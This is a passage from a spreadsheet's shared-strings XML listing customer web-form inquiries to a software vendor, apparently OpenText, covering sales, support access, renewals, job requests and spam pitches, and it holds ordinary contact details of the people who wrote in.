We are needing to set up a new retailer - Belk 127043571000. I changed their access type to "Selection Code" and changed the selection codes that we would use for them to "Unrestricted." Can you please advise what other steps need to be taken to link us with Belk ?_x000D_
_x000D_
Thank you,_x000D_
Codi </t>
  </si>
  <si>
    <t>Would like to learn about your product offering for AP automation that supports integration with SAP. Interested in a high-level demo. Thank you!</t>
  </si>
  <si>
    <t>To acquire OpenText Teamsite CMS development license</t>
  </si>
  <si>
    <t>Interested in understanding more about your ECM products.  Appreciate a call back so we can start with an initial phone conversation</t>
  </si>
  <si>
    <t>We received a renewal notice Reference # RC182058, contract # 0012209263.  We need the actual invoice in order to process the payment.   Could you please send me a copy of the invoice?_x000D_
_x000D_
Thanks,_x000D_
Marlene</t>
  </si>
  <si>
    <t>Chase Paymentech Solutions uses GXS today and would like to leverage our relationship to solve a new need to work with us and a vendor who is moving operations to Japan.</t>
  </si>
  <si>
    <t>Hi,_x000D_
I am a developer who currently does Custom Statement Formatter (CSF) . Since many of my clients in the financial and utilities industries are in the process or have already completed conversions to OpenText, I would like to gain more knowledge of your product. Could you suggest a learning path for a developer? _x000D_
_x000D_
Thanks,_x000D_
Kevin Gingras.</t>
  </si>
  <si>
    <t>I need to re-download the Brava Desktop SX 16.2 software. Please help.</t>
  </si>
  <si>
    <t>The Redact-it software maintenance agreement that we had in relation to our Redact-It Desktop with OCR DFT Enabled purchase on 10/18/16 on order 181772 will expire on October 31, 2017.  This the agreement that provides for support and upgrades.  I understand the renewal fee is $75.90. Could I have a quote for another year of support for this order? This quote is for Portland Community College's Distance Learning department, attention Jade McIntosh. You may email me at dlomax@pcc.edu, Debbi Lomax, Portland Community College IT buyer. Thank you!</t>
  </si>
  <si>
    <t>We are considering our options for overhauling our data infrastructure. One question we are investigating is what Information Management staff should be internal and what IM services should be outsourced to expert consultants. I have written up a description of our needs which I would like to send to you if opentext may be interested in partnering with CCAH. Thank you.</t>
  </si>
  <si>
    <t>I would like to know if Apache Solr comes natively in Web Experience Management.</t>
  </si>
  <si>
    <t>A fax number keeps calling my phone. The number is: 1-800-396-9402  I called, and the recording said to contact this website.</t>
  </si>
  <si>
    <t xml:space="preserve">DocView 5.3.1 recovery documentation. Our server and network have been modified and I need to recover an older system. Any support or documentation to assist is greatly appreciated. </t>
  </si>
  <si>
    <t>I would like to download the latest Documentum patches (for the products under support), pls let me know how to proceed. We have a contract under United Nations.</t>
  </si>
  <si>
    <t>access to documentum downloads</t>
  </si>
  <si>
    <t>I have taken over the support role (from Janette Robb) for RightFax at YVFWC and have been tasked with upgrading RightFax within our enterprise. We are currently running 10.6.1.3080 and would like to update to the latest version. What needs to be done to get this process started?</t>
  </si>
  <si>
    <t xml:space="preserve">Job vacancies in Dubai </t>
  </si>
  <si>
    <t>Exploring BI solutions. We are a small company so worried your solutions/products may be well outside our price range. See free trials available but first wanted to understand pricing mechanisms for your healthcare products. We are an urgent care network.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
Going on three weeks (3) with this problem and it seems to be a total disconnect between employees at OpenText. We are changing software and going with AS2 instead of FTP. Apparently the transmission files are still going to where they can be picked via FTP and not to the repository where AS2 transmission is possible. Emailed with countless support personnel and they ask for the most ridiculous items which could be gathered by an internal phone call.. All we need is to be able to pick transmission documents using Cleo Software via internet using AS2 certificate INSTEAD of Trading Partner via dial up modem!_x000D_
Peter works for our Enterprise Software Developer and is in charge of setting up EDI. I had asked him to take care of this but the internal disconnect within OpenText is overwhelming._x000D_
_x000D_
Thanks,_x000D_
José P. Barrera_x000D_
IT Director, Strybuc Industries._x000D_
_x000D_
_x000D_
_x000D_
Hello there Peter,_x000D_
Good day!_x000D_
I did further read the entire thread and asked Andrea what is the specific issue this time. So basically, she said that I need to verify that the transmission between you and your Trading Partner is successful. Upon checking the IDs mentioned (01:004075826W and 12:6105343200), I have seen that there seem to be no problem with the transmission of files._x000D_
_x000D_
Sender_x000D_
_x000D_
SenderNode:SenderType	_x000D_
Sender OTXQueue	_x000D_
Receiver_x000D_
_x000D_
ReceiverNode:ReceiverType	_x000D_
Receiver OTXQueue	_x000D_
	Submitted Time_x000D_
_x000D_
	Mailboxed Time_x000D_
_x000D_
	Extracted Time_x000D_
_x000D_
	Control Number_x000D_
_x000D_
	EnvType_x000D_
_x000D_
APRF_x000D_
_x000D_
	Sender Ilog_x000D_
_x000D_
IC Position_x000D_
_x000D_
Copy No	_x000D_
M-File Name_x000D_
_x000D_
	Partner User Id_x000D_
_x000D_
Company Name_x000D_
_x000D_
OTX Queue_x000D_
_x000D_
	Status_x000D_
_x000D_
_x000D_
								_x000D_
S 01:004075826W_x000D_
S_NODE:20 - S_TYPE:5-TGMS - S_OTX:  _x000D_
R 12:6105343200_x000D_
R_NODE:10 - R_TYPE:5-TGMS - R_OTX:  	2017-09-11 10:35:44 - EST	2017-09-11 10:35:45 - EST	2017-09-11 11:23:03 - EST	000006639	ISA - 850 	13916305889 view _x000D_
000001 hex _x000D_
010000000  download _x000D_
M9B04832      	ACF17641 / 1641 _x000D_
BARNETT BRASS &amp; COPPER/INTERLINE BR_x000D_
_x000D_
  	Extracted_x000D_
								_x000D_
S 01:004075826W_x000D_
S_NODE:20 - S_TYPE:5-TGMS - </t>
  </si>
  <si>
    <t>Hello guys,_x000D_
_x000D_
I write from Chile, I need a business executive to contact me to ask a formal request for quotation of the SAP ECM Product Open text. We have SAP implemented in Derco, we need a Documental Manager.</t>
  </si>
  <si>
    <t>looking into Records Management V16 course. In Ottawa. wasn't sure if this could be given and when was the next course.  For Gov employee. The EPMO will look into group training as well for 16.2.   (located in Ottawa/Gatineau)</t>
  </si>
  <si>
    <t>Once the switch was made from the registered  Dell EMC. I don't have a  sign-in account on the OPEN TEXT site to gain access to my products that I had under the EMC download site.</t>
  </si>
  <si>
    <t>I inadvertently signed up to Media Bin while trying to sign into Walgreens account.  Please remove me &amp; my debit info from your system.  I was charged .03 and then 1.00 and I am completely clueless on any of this.  I am a grandma and have no need for your company's products.  Thank you&gt;</t>
  </si>
  <si>
    <t>Need to create SR for Documentum product</t>
  </si>
  <si>
    <t>Hi._x000D_
I'm from SAP and I was given this link related to SAP ICM - xCEM integration by Claudia Traving from OpenText:_x000D_
https://knowledge.opentext.com/knowledge/piroot/erlk/v160200-00/erlk-cgd/en/html/whatis.htm_x000D_
_x000D_
I cannot access the resource, I receive message:_x000D_
OpenText Connect_x000D_
No Access_x000D_
We're sorry, your account does not grant you access to this resource._x000D_
_x000D_
Can you please help?_x000D_
Thanks and regards,_x000D_
Christophe</t>
  </si>
  <si>
    <t>Hello, who can I find Updates / Patches for Captiva Capture 7.6 ?</t>
  </si>
  <si>
    <t>Hello,_x000D_
Would like to receive the information upon the criteria to become Opentext partner for the OCC suite. Do you have a partner program available. We are delivering information capture solutions to the end customer as a VAD through resellers via a indirect business model. Thanks for informing us._x000D_
_x000D_
Kind Regards,_x000D_
Pascal Speltdoorn</t>
  </si>
  <si>
    <t>we have previously purchased the licences for 8 units of BRAVA CXL and would like to purchase another. please advise if it is still available and if it can open pdf files. Also if these can be transferred to another new PC if we decided to change the PC</t>
  </si>
  <si>
    <t>hello, we are configuring opentext vim for a customer in germany which has the sap content server in use. sap communicates that sap content server isnt a good choice for long term archiving with respect to gobd regulations or anything like legal compliances. i read in the forums that you offer an opentext content server and that there is a technical presentation which shows up differences and benefits of both. if u have anything likely that, will it be possible to send me those documents? thank you very much. kind regards, toni</t>
  </si>
  <si>
    <t>We need open text Documentum support._x000D_
Please share the link from where we can raise a ticket for documentum support._x000D_
Earlier we were using below link to raise a ST for Documentum issue._x000D_
Pease help how it will work now._x000D_
_x000D_
https://support.emc.com/</t>
  </si>
  <si>
    <t>We have an existing global service license with OpenText. Wanted to meet sales team for future demands and other service portfolio from OpenText. Cell# 9900081039</t>
  </si>
  <si>
    <t>Regarding: OpenText™ Brava! for Desktop_x000D_
_x000D_
Hello!_x000D_
_x000D_
In which languages is the 'OpenText™ Brava! for Desktop' application available?_x000D_
_x000D_
Best regards,_x000D_
_x000D_
Jens Zeumer</t>
  </si>
  <si>
    <t>Good day, I am PhD candidate and I would really love to use your Context Analytics suite for one of my studies. Does Opentext offer the solutions free to students or at student rates?</t>
  </si>
  <si>
    <t>I'm interested in Brava desktop SXL software._x000D_
Do you have reseller in Thailand ?</t>
  </si>
  <si>
    <t>One of our customer is looking for the supported storage platforms for Opentext Archive center. I have gone thorugh the release notes 16 &amp; didn't find FS8600 support. Please let us know is FS8600 supported for this.</t>
  </si>
  <si>
    <t>I have contacted 2 sales reps and have not gotten follow ups. Its very frustrating.</t>
  </si>
  <si>
    <t xml:space="preserve">I am trying to get in contact with your Lexington ky branch. My wallet was stolen and found in the parking lot of open text. An employee/ manager of open text currently has possession of my wallet and am unable to reach her. Her name is Meghan Rich. I would like the contact information to the Lexington branch in order to retrieve my wallet. Feel free to contact me at 859-409-9649. I must retrieve the wallet to observe what has been taken in order to further inform the police </t>
  </si>
  <si>
    <t>Request for a grant</t>
  </si>
  <si>
    <t>Hello Team,_x000D_
_x000D_
I need your assistance quoting a renewal for Three (3) Single User, Brava Desktop, PINS 363850, 363852, 363853.  Annual Maintenance/Support Renewal for Government-owned Brava Desktop. _x000D_
_x000D_
Thank you,_x000D_
_x000D_
Chris</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to see a demo of your DM system.  Management is meeting tomorrow at 12pm EST and would like to see a demo, if possible. </t>
  </si>
  <si>
    <t>We are looking for a cloud based eDiscovery software for our litigation practice.  We use eDOCs DM 5.3.1.  We would like the eDiscovery to integrate with eDOCS and accessible via web.</t>
  </si>
  <si>
    <t xml:space="preserve">I need the link to download all the material and presentation for Content world 2017 </t>
  </si>
  <si>
    <t>I would like to get pricing for iHub Enterprise.</t>
  </si>
  <si>
    <t>Inquiring about EIM solutions</t>
  </si>
  <si>
    <t>We have Actuate running on Windows 2003 server. Would like to talk to someone about how to bulk export reports or to update to run on Windows 2012.</t>
  </si>
  <si>
    <t xml:space="preserve">Can't see my tickets. Email was successfully verified, but site is continuously prompting for  email verification. </t>
  </si>
  <si>
    <t>I would like to attend an interview for the mentioned job profile</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Would you be interested in acquiring email database of Financial Industry? We have complete contact details of:_x000D_
_x000D_
Senior Executive VP, Directors, Accounts manager - banking, credit and investment, Assistant branch manager, Consumer credit manager, Corporate banking services manager, Mortgage manager, Merchant Acquirers, Consultants, Insurance/Trust companies, Merchant services and many more._x000D_
_x000D_
Kindly revert back with your needs such as Target industry, Target job titles, Target geography. So that we can provide you more details i.e. counts, samples, pricing, etc._x000D_
_x000D_
Look forward to hear from you._x000D_
_x000D_
Regards,_x000D_
Scarlett Frost</t>
  </si>
  <si>
    <t>Would like a further call back to discuss implementing DMS into our firm as soon as possible.</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking for an email records management system that will automate the import of email records into an Electronic Records Management System (Documentum Records Client 6.8) with minimum human intervention. We are currently searching for email records management application that will meet our requirements and will fit our environment. We use Outlook 2016 including Outlook for MAC 2016, MS Exchange and Linux servers with approximate 12,600 user mailboxes. Can I talk to a technical person on this and sales rep to get an ROM cost estimate. </t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
We already have a service with Opentxt Rightfax, we need to find out how much it would cost to buy another OpenText Gateway appliance._x000D_
Currently we have two gateways 2100 in two of our data center locations (Houston and Georgia)_x000D_
We are working to move the Georgia data center to Co-Lo, so instead of trying to move the one at Alpha 1, maybe we can set up another at the new Co-Lo and migrate to it.  We would need cost of the appliance along with professional services.  _x000D_
Or Maybe you can loan us one until we can move the Alpha 1 gateway over there!_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Interested in pricing for a single station. </t>
  </si>
  <si>
    <t>Hello,  I am trying to edit my profile in order to update some details since I applied to on of the open positions in Munich. It is impossible to select one of the options in the Privacy Notice part._x000D_
_x000D_
Thank you _x000D_
_x000D_
Or Sela</t>
  </si>
  <si>
    <t>Reviewing option to utilize ETX within our environment and have technical questions regarding sizing and architecture to deploy solution. Items required: sizing metrics for various components, recommended hosting architecture and understanding of supported hosting methodologies (ie. physical, virtual)._x000D_
_x000D_
Thanks_x000D_
Scott</t>
  </si>
  <si>
    <t>Looking to deploy Right Fax as enterprise solution.</t>
  </si>
  <si>
    <t xml:space="preserve">Need to have a sales rep contact me in order to gather some info on your product right fax. We will maybe needing this with our implentation of our new EMR. </t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I have logged in today but I am unable to see "My Support" and all the Covance related tickets. Could my permissions be looked at to make sure I have the correct access? Let me know if you need any more info._x000D_
_x000D_
Thanks_x000D_
Jamie</t>
  </si>
  <si>
    <t>All the sudden can't access my support tickets.</t>
  </si>
  <si>
    <t xml:space="preserve">Greetings,_x000D_
Our records show you are using a different remit address for EasyLink International than we have used in the past.  In order for us to update our files our policy is to get a change of address letter on company letterhead that includes both the old and new remit address.  We require this letter even if the new address is for a new branch or department.  You can reply to this e-mail with that letter.  If you have any question please don’t hesitate to call or e-mail._x000D_
Thank you in advance,_x000D_
</t>
  </si>
  <si>
    <t>ULI is wanting to explore ECM solutions to assist with knowledge management, document management, and document collaboration.  ULI is also wanting assistance to explore what-if scenarios on how to better curate and provide content to its members.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I am helping my client to choose the right DAM system for their use. They need a reliable and cost-efficient solution to support their multi-national business. Mainly for marketing purposes and collaboration with agencies. Approximately ~250 users. _x000D_
_x000D_
Could you please provide me some initial pricing information to understand where you stand against the competition in that respect? _x000D_
_x000D_
Thank you!_x000D_
_x000D_
With best regards,_x000D_
_x000D_
Simo Ala-Nissilä</t>
  </si>
  <si>
    <t xml:space="preserve">I cannot restore my password: Update Password Failed </t>
  </si>
  <si>
    <t>We are currently investigating various products for an upcoming document management project. We would like to discuss further this requirement and understand if OpenText can meet these requirements and also get an idea of potential cost.</t>
  </si>
  <si>
    <t>Following the change of name of my company (ERDF vs ENEDIS), my professional email has changed, could associate it with my account openText instead jean-baptiste.loty@erdf.fr_x000D_
Best Regard</t>
  </si>
  <si>
    <t>I am trying to login to the 'MySupport' account but dont have the details to register. Are you able to provide them?_x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>Dear Events Responsible Team,   _x000D_
 _x000D_
Hope this E-Mail finds you in good health._x000D_
 _x000D_
This is a quick brief about our services._x000D_
 _x000D_
Avenir Modeling &amp; Events provides professional temporary employees to be in all your event requirements:_x000D_
Models, Hostesses, Promoters, Ushers, Ticketing, Registration, Scanner, Supervisors._x000D_
 _x000D_
Avenir works in many different sectors, such as:_x000D_
-Instore promotion_x000D_
-Duty Free Promotions_x000D_
-Indoor &amp; Outdoor Events_x000D_
-Exhibitions_x000D_
-Road Shows_x000D_
-Fashion Events &amp; Shows_x000D_
-Concerts_x000D_
-Restaurants &amp; Bars_x000D_
-Product &amp; Fashion Photoshoots_x000D_
 _x000D_
In addition to that, I would like to arrange a meeting with you in order to present Avenir Modeling &amp; Events L.L.C  as a trustful business partner when it comes to Modeling &amp; Events services._x000D_
  _x000D_
Please find attached the hostess presentation on the link below;_x000D_
https://drive.google.com/file/d/0BwQCF6IwlyHNc0d5UUkxUnExRVk/view?usp=sharing_x000D_
_x000D_
Looking forward to hear from you soon!_x000D_
 _x000D_
Kind Regards,_x000D_
Ksenia Chuvileva_x000D_
Operations Manager_x000D_
Mobile: +971567245524_x000D_
E-Mail: ksenia.ch@avenirevents.com_x000D_
website: www.avenirevents.com_x000D_
Office 102A, First Floor, Aspin Commercial Tower, Sheikh Zayed Road, PO Box: 71255, Dubai, UAE</t>
  </si>
  <si>
    <t>Can you please let me know if there are openings for Ediscovery, if so, please do contact me</t>
  </si>
  <si>
    <t>I need this document : https://knowledge.opentext.com/knowledge/cs.dll/Open/56784012_x000D_
I need to get access to support &amp; knowledge information.</t>
  </si>
  <si>
    <t>Sales enquiry re:email filtering requirement. Could you please confirm contact for Deutsche Bank in NYC. Thanks</t>
  </si>
  <si>
    <t>Looking for software jobs in canada</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to take up course of Open Text Administration and fundamental as I will be perusing the job as Open Text Admin. </t>
  </si>
  <si>
    <t>activate opentext support account</t>
  </si>
  <si>
    <t>Interested in the FirstClass System</t>
  </si>
  <si>
    <t xml:space="preserve">I am unable to add network aliases again, can someone call me on Tuesday morning after 9:30 PST to help me fix this?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Need help with Gupta 5.2 uninstall and 6.2 install</t>
  </si>
  <si>
    <t>Just want to check/verify if the Xerox Color 70 printer is one of the supported devices for the Right Fax software.  Any reply is appreciated.</t>
  </si>
  <si>
    <t>employment opportunities - I'm wondering if you have any positions that will allow someone to work from their own home.  Travel is fine, but would be unable to relocate to another city at this time.</t>
  </si>
  <si>
    <t>FoIP with Cerner</t>
  </si>
  <si>
    <t xml:space="preserve">I cant pay on line, please contact me for payments intrucctions._x000D_
tanks._x000D_
glenny </t>
  </si>
  <si>
    <t>I'd like to enroll in the 3-0126 System and Search Administration v10.5 SP1 course. I work in Toronto, but live near Waterloo. Do you know when this course will be offered near these locations, or on-line? Thanks!</t>
  </si>
  <si>
    <t xml:space="preserve">Need a quote for the cloud based service for 8 licenses and an online demo to show departments how it works. _x000D_
</t>
  </si>
  <si>
    <t>Updates</t>
  </si>
  <si>
    <t>We are evaluating ECM solutions for one of our clients in Spanish Public Administration._x000D_
Could you transfer this inquiry to you Spanish local representative in Madrid?_x000D_
Thanks in advance and kind regards</t>
  </si>
  <si>
    <t>We would like some information on Open Text Redact IT, what its functionality is, and can it integrate into Salesforce.   We have some documents that we would like to check for PII (various types) and either prevent upload, or redact prior to upload, in both a real time (user) and batch process.</t>
  </si>
  <si>
    <t>Request access to My Support for opening Tickets.  Product: Exceed 15, Serial: V117822-000.</t>
  </si>
  <si>
    <t>Document management for law firms.</t>
  </si>
  <si>
    <t>price quote</t>
  </si>
  <si>
    <t>Die hkk Krankenkasse möchte in den nächsten Monaten ein DAM-System einführen und dazu würden wir gerne weitere Informationen und möglichst eine Demo von OpenText sehen. _x000D_
Bitte nehmen Sie Kontakt auf über die im Formular angegebenen Daten._x000D_
Mit freundlichen Grüßen_x000D_
Cornelia Gutsche</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I'm not sure if we have Customer Support contract. Can you verify?_x000D_
_x000D_
Also, I'm following up a reques to setup a trading partner. Last response I received was on Sep 7. Made several follow up after that, but didn't get any response._x000D_
_x000D_
Thanks.</t>
  </si>
  <si>
    <t>trying to get access to support and product downloads</t>
  </si>
  <si>
    <t>We have a legacy paper document system. The company is transforming into a pharmaceutical development company and we need a document system for general and controlled documents.</t>
  </si>
  <si>
    <t>Had been working with Mark Tarica from your organization (Florida office I believe) on getting a demo set up to view your software but unfortunately Mark has left the company.  Tried a couple times to get someone to call me back to keep the ball rolling but have not received a return call as of today.  This is my final attempt.</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
_x000D_
Nous utilisons actuellement votre solution Vignette OpenText pour administrer les Portails d'aide à vente pour nos distributeurs (Société Générale, Crédit du Nord). Nous allons lancer prochainement un projet de refonte de ces intranets et aimerions avoir de l'information sur vos solutions de search engine et IA._x000D_
_x000D_
Pourriez vous me contacter pour en discuter?_x000D_
_x000D_
D'avance merci pour votre retour._x000D_
_x000D_
Cordialement,_x000D_
Florian Ruscassie</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We are interested in the product TeleForm, but we could not find price information. Could you please kindly send us the price or just let us know where to find the related info?_x000D_
_x000D_
Regards,_x000D_
Jin Li</t>
  </si>
  <si>
    <t>I've attempted several times to confirm my registration for OpenText MySupport. I keep getting the same routine. Brings me to the Almost there! page and request to verify email, which I have done several times. I have not received any email from a representative._x000D_
Thank you,_x000D_
Lisa Wilson</t>
  </si>
  <si>
    <t>I have a knowldge and experience regarding in Tech. Support so please give me a chance to join in your team</t>
  </si>
  <si>
    <t>Need information about pricing for edocs law suit.</t>
  </si>
  <si>
    <t>Hello,_x000D_
We are looking to move to cloud based solution, and would like to have a quote from your company._x000D_
_x000D_
Thank You_x000D_
Luke Warzecha</t>
  </si>
  <si>
    <t>Supply database</t>
  </si>
  <si>
    <t>I can't access online support on your website, and our organization should have a support contract for my account..._x000D_
_x000D_
After confirming my email address, the support area still says I don't have access to this resource._x000D_
_x000D_
We have an active support contract for Documentum products through Dell/EMC._x000D_
_x000D_
Dell/EMC have removed Documentum products from our site IDs on their support portal, even though our contract is in good standing. We currently have no way of opening support tickets with them for the appropriate products. Is this due to the transition to OpenText, or a separate issue with Dell/EMC?_x000D_
_x000D_
We are also unclear who the OpenText sales representative/POC is for the US Dept. of Energy - who should we be checking in with and coordinating, etc.?_x000D_
_x000D_
Please advise.</t>
  </si>
  <si>
    <t xml:space="preserve">Need product DEMO. </t>
  </si>
  <si>
    <t>I had an account on EMC for the tickets for documentum and now documentum migrated to OpenText but my account doesn't work._x000D_
I remember I managed to access it once, and now my email doesn't exist anymore?_x000D_
stephane.biehler@bis.org</t>
  </si>
  <si>
    <t>We are startup BPO and IT Consulting firm. I am looking for an opportunity to work with opentext._x000D_
_x000D_
It would be great if you are looking for best company to outsource any of your projects. we are here with young strength to work efficiently and reduce your cost. _x000D_
_x000D_
If you have any kindly reach out us _x000D_
Direct Dial : 0 978 982 3964 _x000D_
EmailID: admin@sangotechs.com_x000D_
Website: www.sangotechs.com</t>
  </si>
  <si>
    <t>we currently have Spicer Imagenation release 8.30 (32 bit). we are moving to WIN 10. are there any compatibility issues?</t>
  </si>
  <si>
    <t>Interested in learning more about Magellan</t>
  </si>
  <si>
    <t>Looking for doc system and training management system for small company</t>
  </si>
  <si>
    <t xml:space="preserve">Currently we're a customer of RightFax but through our partnership with Ricoh.  Our contract expires in 100 days and I would like to work directly with OpenText and bypass Ricoh.  Please contact me.  </t>
  </si>
  <si>
    <t>Hi there. We are currently running eDocs 5.3.1 and wondering if you have a trial version of the newer client version that we could test? Many Thanks Kate</t>
  </si>
  <si>
    <t>Hi Team,_x000D_
Amgen is supporting OTG applicationXtender 7.0. As we are ahead with windows 10 upgradation need confirmation if OTG is compatible in windows 10</t>
  </si>
  <si>
    <t>BPM on Cloud Technical Information - Mainly the Cloud capabilities - multi tenancy models etc</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
I have just validated my account, but I have this error  “No Access_x000D_
Please help me, i will just validate my account but i have this error : _x000D_
We're sorry, your account does not grant you access to this resource”_x000D_
Please help me !!_x000D_
</t>
  </si>
  <si>
    <t>Could you please let me know if "Documentum IRM Client for Microsoft Office 5" is still supported and specifically if supported on Windows 10?</t>
  </si>
  <si>
    <t xml:space="preserve">who is receiving this inquiry?  ise de bruyker </t>
  </si>
  <si>
    <t xml:space="preserve">Dear sirs,_x000D_
Unfortunately we are not receiving any faxes submitted on following fax number to our _x000D_
Fax to E-mail service._x000D_
Below is your registered fax number(s) and e-mail address(es)_x000D_
 for inbound service:   _x000D_
 498005889057  hexal@cwt-me.com_x000D_
Account number 78512_x000D_
Could You kindly check why?_x000D_
Is there anything we missed to do?_x000D_
Thanks for your soonest support_x000D_
Kind regards Diana Köster_x000D_
_x000D_
Diana Köster | Team Leader_x000D_
CWT Meetings &amp; Events im Hause Novartis_x000D_
Office +49 911 273 13086 | Fax +49 800 588 90 57_x000D_
Roonstr. 25 | 90429 Nürnberg | Germany_x000D_
diana.koester@cwt-me.com | www.cwt-meetings-events.com_x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I am writing to You from SMIT. We have EmailXtender licenses and now we have few questions. Who should I contact with?_x000D_
_x000D_
Best Regards,_x000D_
_x000D_
Airi Miilits</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We have bought EmailXtender many years ago. Now we have few questions about that. Who could give me some answers etc? _x000D_
_x000D_
Best Regards,_x000D_
_x000D_
Airi Miilits_x000D_
SMIT</t>
  </si>
  <si>
    <t>We are evaluating a knowledge management tool for a manufacturing client. Can you send in your offering and supporting documents</t>
  </si>
  <si>
    <t>kindly provide sales contact detail email address for quotation purposes. its URGENT</t>
  </si>
  <si>
    <t>i'm looking for sales person contact detail email address for Request for Quotation purposes. It URGENT. Kindly provide ASAP.</t>
  </si>
  <si>
    <t>We would like to get more information for below courses:_x000D_
1.	2-3114 OpenText Process360 Developers Essentials_x000D_
2.	3-3120-eL Introduction to OpenText Case360 – CBT_x000D_
_x000D_
Questions:_x000D_
1. Are these courses available in Malaysia? Which training centre held these training?_x000D_
2. Possible to arrange in-house training?_x000D_
3. May I have the course outline?_x000D_
4. How much is the fee for each course?_x000D_
_x000D_
Thank you._x000D_
_x000D_
Regards,_x000D_
Chong Yee Ping_x000D_
+603 8994 2900 ext 268</t>
  </si>
  <si>
    <t>I am trying to get into isaiahbrault@gmail. Com and none of the ways for me to get in has helped I would appreciat it if you could give me my password.</t>
  </si>
  <si>
    <t>interested in discussing the product and licensing.</t>
  </si>
  <si>
    <t>We are opentext partner but I don't have access of opentext documentation XECM etc.</t>
  </si>
  <si>
    <t>Looking for a friend</t>
  </si>
  <si>
    <t>need a friend</t>
  </si>
  <si>
    <t>PLANING TO START BUSINESS... SO PLANING TO START AS OFFICIAL BUSINESS.</t>
  </si>
  <si>
    <t>We are looking for our close relation named, Serdar Erozan. As far as we know he has been working in your company for more than ten years. Could you please help me contact Serdar if he still is with you?_x000D_
Thanks in advance..._x000D_
Vildan and Fatin</t>
  </si>
  <si>
    <t>Take course 3-2105 Vendor Invoice Management (VIM) for SAP Solutions Consultant Bootcamp</t>
  </si>
  <si>
    <t>I purchase gifts for myself, family, friends, co-workers, etc. How is this being monitored accurately if I tell or don't about who I am purchasing for? If that does assist you in answering my question as, best you possibly can.</t>
  </si>
  <si>
    <t>Get Pricing quote for RightFax</t>
  </si>
  <si>
    <t xml:space="preserve">Hello Team,  Get your website on Google’s front Page search:  We would like to have a discussion with you regarding the web promotion strategy for your website. We wish to work out a proposal to strengthen the online presence of your website, via, a strategically planned web promotion campaign. In today’s online era, you should be focusing on the new revolutionary ways of generating traffic.  We are curious to know if you were are that are a few issues bugging your website. Sorting out these will help you get the best returns out of your website.  Your website seems to be attracting traffic, but this traffic is almost stagnant and limited, which affects potential sales as you move forward.  Your website doesn't feature in Google's first search page for some of the major keywords in your niche, which affects visibility.  Your website has been diagnosed with coding issues, which affects ranking.  Your back links profile is not efficient enough to help your search engine visibility.  Your website is currently not being properly promoted online, which is affecting your marketing strategy and goals  Your presence on social media platforms, such as (Facebook, Twitter, etc.) is minimal. which is depriving you of a huge market of prospective referral clients.   We excel in running promotional online marketing campaign for websites. We have a host of ethical services and techniques, which you can utilize to improve your website's performance. We could send you more details regarding your present website status; we would be glad to share your “PRE SEO REPORT” or “WEBSITE ANALYSIS REPORT for FREE”.  Kindly reply back if you are interested, so we can send you more details about the package which could improve your sales &amp; website ranking too.  Hope to back from you soon.  Best Regards,  Alisha Wilson | Senior Sales Advisor _________________________________________________________________________  PS1: Please respond to our email with “Interested” or “Not Interested” so that we </t>
  </si>
  <si>
    <t>I am looking for java developer, if any queries please contact me</t>
  </si>
  <si>
    <t xml:space="preserve">We would like to set up a demo for the first week of October. Please contact me via email. </t>
  </si>
  <si>
    <t xml:space="preserve"> law firm  document management system. </t>
  </si>
  <si>
    <t>PCI Compliance need solution to scan data-at-rest; find credit card numbers and strip or Redaction of numbers in documents. mostly excel but other unstructured data files as well._x000D_
Must keep records but not the numbers for at least 7 years.</t>
  </si>
  <si>
    <t xml:space="preserve">Y600 u 35_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Y600_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I have a client who cannot receive faxes sent using Open Text / RightFax services. The fax line has been verified to work, and the office can send and receive faxes sent using physical fax machines. Please contact me at your earliest convenience. _x000D_
Sincerely,_x000D_
Jim Morris_x000D_
CloudCraft IT Solutions Inc._x000D_
403.383.3357_x000D_
</t>
  </si>
  <si>
    <t>I am working with a customer that is looking for budgetary pricing  on a cloud faxing solution. I understand that HBS is a partner with OpenText.  What information is need to obtain a budgetary quote?_x000D_
Thank you!</t>
  </si>
  <si>
    <t xml:space="preserve">I want to learn OpenText ECM product, so that I can implement on demand.  </t>
  </si>
  <si>
    <t>I am seeking a sales position within the Federal market. I have an extensive back round in Federal Government arena. Prefer Strategic and Enterprise and Business Development roles</t>
  </si>
  <si>
    <t>Dear_x000D_
I have a customer that want an rightfax server of 90 channel concurrents, will connect to an Cisco solution.  please send me an referential quote. thanks in advance._x000D_
Best regards</t>
  </si>
  <si>
    <t>Please have someone contact me regarding the OpenText RightFax managed services.</t>
  </si>
  <si>
    <t xml:space="preserve">In the future we are looking to migrate text based and AFP based reports from the mainframe to the distributed platform. Most report files will contain multiple reports that need to be separated into individual reports. There is normally a criteria such as a page number._x000D_
Does your product perform any such conversion in that a file of multiple reports can be imported and broken out as individual reports? _x000D_
Does it convert from text to PDF or from AFP to PDF if needed? _x000D_
Is import manual or is a feature such as dropping a file in a location and the product pulls it in and processes it?_x000D_
</t>
  </si>
  <si>
    <t>Dear Supportteam,_x000D_
_x000D_
can you please support me to give an external consultant, who is acting as a project lead for us, access to our ITSM tool? This is very important, as we have a client escalation, because our PL is not able to trigger support cases.</t>
  </si>
  <si>
    <t>I have the call manager technician ready to go for today Friday the 15th at 10am CST.  I do not have a webex number yet but we will call and let you know.</t>
  </si>
  <si>
    <t>I have a customer - Mining Company that requires an Electronic Content Management Solution for the Legal Department. Kindly send me a feasible proposal for this client.</t>
  </si>
  <si>
    <t>Checking on where this inquiry form for Active Client Management is being directed and want to ensure that if the inquiry is for PS Services you please copy my address.</t>
  </si>
  <si>
    <t>We are looking for a new fax solution.</t>
